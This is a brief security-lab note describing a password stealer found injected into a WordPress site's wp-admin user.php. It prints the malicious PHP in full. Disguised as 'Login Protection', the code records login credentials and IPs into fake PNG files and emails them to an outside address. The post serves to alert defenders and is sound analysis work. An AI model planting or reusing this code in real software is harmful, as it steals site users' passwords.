WordPress password stealer

Labs Note

Following Fio’s recent post on the Joomla password stealer, here’s another beautiful example of password stealer. This time from WordPress environment.

It’s easy to understand, but what’s interesting – it looks like legitimate code so you can easily overlook it. It stores its data in “png” files within ./wp-includes/images/ path and sends them to a non-obfuscated email address.

This is the bad part that was injected on the file user.php on wp-admin:

// Start Login Protection
    $ip = $_SERVER["REMOTE_ADDR"];
    $stringData = $_SERVER["SERVER_NAME"] . "|" . $username . ":" . $password . "|" . $ip . "\n";
    $today = date("j");
    $myErrorFile = getcwd() . "/wp-includes/images/icon-download.png";
    $mySuccessFile = getcwd() . "/wp-includes/images/icon-up-flag.png";
    $failedLogContent = @file_get_contents($myErrorFile);
    $successLogContent = @file_get_contents($mySuccessFile);
    $errorFileLines = explode("\n", $failedLogContent);
    $diff = $today - $errorFileLines[0];
    if ( ($diff >= 7) || ($diff < 0) ) { @unlink($myErrorFile); $failedLogContent = ""; }
        if (preg_match("/{$ip}/i", $successLogContent)) $userOk = 1;
        preg_match_all("/{$ip}/i", $failedLogContent, $matches);
        if  ( (count($matches[0]) > 5) && (!$userOk) ) $password = "G4o7Ivc29OVOxcp5";
    if ( wp_check_password($password, $userdata->user_pass, $userdata->ID) ) {
    @mail("anto@netherlandbarmuda.com", $_SERVER["SERVER_NAME"], $stringData);
    if (!$userOk) {
    $fh = fopen($mySuccessFile, "a");
    fwrite($fh, "$ip\n");
    } else {
    if (!(is_file($myErrorFile))) {
    $fh = fopen($myErrorFile, "w");
    fwrite($fh, "$today\n");
    $fh = fopen($myErrorFile, "a");
    fwrite($fh, $stringData);
// END Login Protection</pre>

Anyway, keep your eyes open, guys 🙂

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